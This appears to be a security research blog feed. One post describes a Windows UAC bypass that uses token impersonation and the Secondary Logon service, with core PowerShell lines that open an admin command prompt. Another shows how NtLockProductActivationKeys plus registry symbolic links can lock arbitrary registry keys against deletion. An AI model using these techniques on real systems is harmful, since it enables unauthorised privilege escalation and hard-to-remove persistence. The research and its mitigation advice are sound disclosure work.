So we're now committed, we want to get back that which Microsoft have taken away. The first thought would be can we just use the elevated token to create a new process? As I described in Part 2 due the various checks (and the fact we don't have SeAssignPrimaryTokenPrivilege), we can't do so directly. But what about indirectly? There's a number of system services where the following pattern can be observed:

voidCreateProcessWithCallerToken(stringpath){RpcImpersonateClient(nullptr);HANDLEToken=OpenThreadToken();HANDLEPrimaryToken=DuplicateToken(Token,TokenPrimary);CreateProcessAsUser(PrimaryToken,path,...);}

This code creates a new process based on the caller's token, be that over RPC, COM or Named Pipes. This in itself isn't necessarily a security risk, the new process would only have the permission that the caller already had during impersonation. Except that there's numerous places in the kernel, including our impersonation check, that explicitly check the process token and not the current impersonation token. Therefore being able to impersonate a token doesn't necessarily mean that the resulting process isn't slightly more privileged in some ways. In this case that's exactly what we get, if we can convince a system service to create a process using the non-elevated copy of an elevated token the logon session flags won't have the LIMITED_LOGON_SESSION flag set as the logon session is shared between all Token object instances. We can therefore do the following to get back full admin privileges:
  1. Capture the admin token and create a restricted version which is no longer elevated.
  2. Impersonate the token and get a system service to create a new process using that token. This results in a low-privilege new process which happens to be in the non-limited logon session.
  3. Capture the original full privileged admin token in the new process and impersonate, as our logon session doesn't have the LIMITED_LOGON_SESSION flag the impersonation check passes and we've got full privilege again.
A good example of this process creation pattern is the WMI Win32_Process::Create call. It's a pretty simple function and doesn't do a lot of checking. It will just create the new process based on the caller. It sounds ideal and PS has good support for WMI. Sadly COM's weird security and cloaking rules makes this a pain to do in .NET, let alone PS. I do have C++ version but it's not simple or pretty, but it works from Vista through Windows 10 Creators Update. I've not checked the latest insider preview builds (currently running RS3) to see if this is fixed yet, perhaps if it isn't yet it will be soon. I might release the C++ version if there's enough interest.

Still it would be nice if I could give a simple script for use in PS for the hell of it. One interesting observation I made when playing with this is that impersonating the restricted version of the elevated token while calling the LogonUser API with the LOGON32_LOGON_NEW_CREDENTIALS logon type returns you back the elevated token again (even with a High IL), run the following script to see the result ($token needs to be a reference to the elevated token).

# Filter elevated token down to a non-elevated token$lua_token=Get-NtFilteredToken-Token$token-FlagsLuaToken$lua_token|Format-List-PropertyUser,Elevated,IntegrityLevel# Impersonate non-elevated token and change credentialsUse-NtObject($lua_token.Impersonate()){Get-NtToken-Logon-UserABC-LogonTypeNewCredentials}|Format-List-PropertyUser,Elevated,IntegrityLevel

This is interesting behavior, but it still doesn't seem immediately useful. Normally the result of LogonUser can be used to create a new process. However as the elevated token is still in a separate logon session it won't work. There is however one place I know of that you can abuse this "feature", the Secondary Logon service and specifically the exposed CreateProcessWithLogon API. This API allows you to create a new process by first calling LogonUser (well really LsaLogonUser but anyway) and takes a LOGON_NETCREDENTIALS_ONLY flag which means we don't need permissions or need to know the password.

As the Secondary Logon service is privileged it can happily create a new process with the newly minted elevated token, so all we need to do is call CreateProcessWithLogon while impersonating the non-elevated token and we get an arbitrary process running as full administrator (barring some privileges we had to remove) and even a High IL. The only problem is we've changed our password in the session to something invalid, but it doesn't matter for local access. As it's still pretty long I've uploaded the full script here, but the core is these few lines:

Use-NtObject($lua_token.Impersonate()){[SandboxAnalysisUtils.Win32Process]::CreateProcessWithLogin("Badger","Badger","Badger","NetCredentialsOnly","cmd.exe","cmd.exe",0,"WinSta0\Default")}

Detection and Mitigation

Is there a good way of detecting this UAC bypass in use? Prior to Windows 10 it can be done pretty silently, a thread will magically become more privileged. So I suppose you might be able to detect that taking place, namely a elevated token being impersonated by a non-elevated process. For Windows 10 is should be easier as you need to do one or more dances with processes, at least as I've implemented it. I'm not much into the latest and greatest in DFIR, so perhaps someone else is better placed to look at this :-)

On the mitigation side it's simple:

DON'T USE SPLIT-TOKEN ADMINISTRATOR ACCOUNTS FOR ANYTHING YOU CARE ABOUT.

Or just don't get malware on your machine in the first place ;-) About the safest way of using Windows is to run as a normal user and use Fast User Switching to login to a new session with a separate administrator account. The price of Fast User Switching is the friction of hitting CTRL+ALT-DEL, then selecting Switch User, then typing in a password. Perhaps though that friction has additional benefits.

What about Over-The-Shoulder elevation, where you need to supply a username and password of a different user, does that suffer from the same problem? Due to the design of UAC those "Other User" processes also have the same Logon Session SID access rights so a normal, non-admin user can access the elevated token in the same way. Admittedly just having the token isn't necessarily exploitable, but attacks only get better, would you be willing to take the bet that it's not exploitable?

Wrapping Up

The design behind UAC had all the hallmarks of trying to be secure and it turning out to be impossible to do so without severely compromising usability. So presumably it was ret-conned into something else entirely. Perhaps it's finally time for Microsoft to take UAC out the back and give it a proper sending off. I wonder if with modern versions of Windows the restrictions on compatibility can be dropped as UAC has served its purpose of acting as a forcing function to try and make applications behave better. Then again MS do seem to be trying to plug the leaks, which is surprising considering their general stance of it not being a security boundary, so I don't really know what to think.

Anyway, unless Microsoft change things substantially you should consider UAC to be entirely broken by design, in more fundamental ways than people perhaps realized (except perhaps the CIA). You don't need to worry about shared resources, bad environment variables, auto-elevating applications and the like. If malware is running in your split-token account you've given it Administrator access. In the worst case all it takes is patience, waiting for you to elevate once for any reason. Once you've done that you're screwed.

Locking Your Registry Keys for Fun and, Well, Just Fun I Guess

$
0
0
Let's assume you have some super important registry keys that you don't want anyone to modify or delete, how might you do it? One way is to change the security descriptor of the registry key to prevent others modifying it. However when combined with a kernel driver (such as AV) or an admin with sufficient privilege this can be trivially bypassed. Another common trick is to embed NUL characters into the key or value names you want to protect. That trick tends to break Win32 API users such as typical registry editors as the Win32 APIs use NUL terminated strings where as the kernel APIs do not. However that won't stop someone more persistent. The final trick I can think of would be to write a kernel driver which uses the "Registry Filter Callback" APIs to block access to the keys, however Microsoft are making it as hard as possible to run arbitrary kernel code (well legit kernel code anyway) so writing a driver sounds like an unnecessary extravagance.

So what can we do? Turns out there is an API in the kernel called NtLockRegistryKey. Though unsurprisingly it isn't documented. It's pretty obvious what the parameters are though based on 2 seconds of RE, it looks like the following:

NTSTATUS NtLockRegistryKey(HANDLE KeyHandle);

All the system call takes is a registry key handle, adding it to my NtObjectManager Powershell module we can call it and see what we happens:


Apparently we don't have a privilege enabled to lock the key. Turns out no matter what privilege you enable it still doesn't work, something odd is going on. Let's look back at the kernel to see if we can find the privilege we require:

NTSTATUSNtLockRegistryKey(HANDLEHandle){if(KeGetCurrentThread()->PreviousMode != KernelMode)returnSTATUS_PRIVILEGE_NOT_HELD;....}

Apparently from this code the privilege we need is to be running in the kernel! If we need that then we might as well just write that registry filter driver. Still all is not necessarily lost, perhaps there's some code in the kernel which calls this function to lock existing registry keys we can abuse? You might also assume this could also be called by a kernel driver, but neither the Zw or Nt versions of the system call are exported by NTOSKRNL, making it very unlikely any legitimate driver will call it. A quick XREF check in IDA shows exactly one caller, NtLockProductActivationKeys. Why am I not surprised it's used for DRM purposes?

Anyway, let's do a quick bit of RE on the kernel function to work out what it's doing with registry keys.

NTSTATUSNtLockProductActivationKeys(){HANDLERootKeyHandle;UNICODE_STRINGRootKey;OBJECT_ATTRIBUTESObjectAttributes;// Initial path is obfuscated in the kernel. RtlInitUnicodeString(&RootKey,L"\\Registry\\Machine\\System\\WPA");InitializeObjectAttributes(&ObjectAttributes,&RootKey,...);NTSTATUSstatusZwOpenKey(&RootKeyHandle,KEY_READ,&ObjectAttributes);if(NT_SUCCESS(status)){ULONGKeyIndex=0;PKEY_BASIC_INFORMATIONKeyInfo=// Allocate a buffer... while(ZwEnumerateKey(KeyHandle,KeyIndex,KeyBasicInformation,KeyInfo)!=STATUS_NO_MORE_ENTRIES){HANDLESubKeyHandle=OpenKey(RootKeyHandle,KeyInfo->Name);if(!IsRegistryKeyLocked(SubKeyHandle)){ZwLockRegistryKey(SubKeyHandle);}ZwClose(Handle);++KeyIndex;}}ZwClose(KeyHandle);returnlast_status;}

All this code does is open a root key, the "HKLM\System\WPA" key, although if you look at the actual code the key name is "obfuscated" in the binary. Thanks DRM you so crazy. It then enumerates and opens any sub-keys and calls ZwLockRegistryKey on each key handle. There seems to be no other checks being done for privileges so this should be callable from user mode, and because the Zw version of the lock key system call is used that will set the previous mode to Kernel satisfying the security check requirements.

At this point we don't even know if locking a registry key does anything useful. However we now know that sub-keys under the WPA registry key are locked, let's try and write a value to one of the sub-keys of the WPA key as an administrator.


So that's pretty much what we expected, even though we've got SetValue access to the key trying to set a value fails with STATUS_ACCESS_DENIED. If you look back at how NtLockProductActivationKeys works you might notice that the kernel doesn't lock the WPA key, but only enumerated sub-keys. Therefore there's nothing stopping us creating a new sub-key under WPA, re-running NtLockProductActivationKeys and getting a locked key.


So the fun thing about this locking function is it seems to not just block user mode but also kernel mode callers from modifying the key. There doesn't seem to be a public way of unlocking the key again (DRM remember). There's no ZwUnlockRegistryKey function and the only way of doing anything would be to grovel in the innards of the Key Control Block to unlock it which Microsoft have been trying desperately to discourage. The lock prevents any modification and also deleting the key itself (however the function doesn't automatically lock sub-keys). The only way to clear the locked state is unload the hive (tricky if a system hive) or reboot. However the kernel calls NtLockProductActivationKeys very early in the boot process *sigh* DRM *sigh* so it's pretty tricky to find a time when you can just delete the key.

While writing to the WPA location might be okay just to store some configuration, probably what you want is persistence in another location. Fortunately if you check out the implementation you'll find that it doesn't take into account registry key symbolic links. So to protect other parts of the registry just create a sub-key which actually is a symbolic link which points to a key you want to protect. The re-run NtLockProductActivationKeys and it will now be locked. If you stick to the SYSTEM  hive (such as a service registration) this should even get protected at boot time. Of course the weakness of this is the symbolic link key in WPA doesn't actually get protected itself, so you can delete the symbolic link and on next boot the protection will go away. Of course this doesn't work in most registry tools which blindly follow symbolic links ;-)

Anyway, this is a fun, if somewhat silly feature. I can understand why it's not exposed to user-mode callers but I've literally no idea why it's a system call at all. The strange things DRM does to peoples' minds.
Viewing all 81 articles
Browse latest View live